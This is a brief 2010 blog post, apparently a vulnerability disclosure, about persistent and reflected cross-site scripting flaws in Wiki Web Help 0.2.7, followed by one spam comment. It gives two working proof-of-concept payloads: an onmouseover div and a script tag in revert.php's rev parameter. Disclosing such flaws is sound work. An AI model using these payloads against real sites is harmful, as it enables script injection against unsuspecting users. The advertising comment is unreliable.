This site is soon to be deprecated by http://www.johnleitch.net

Thursday, July 1, 2010

Wiki Web Help 0.2.7 Persistent/Reflected XSS

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.


PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E

1 comment:

  1. Best Software Downloads and Reviews. the most comprehensive source for free-to-
    trysoftware downloads on the WebBEST 4
    DOWNLOADS

    ReplyDelete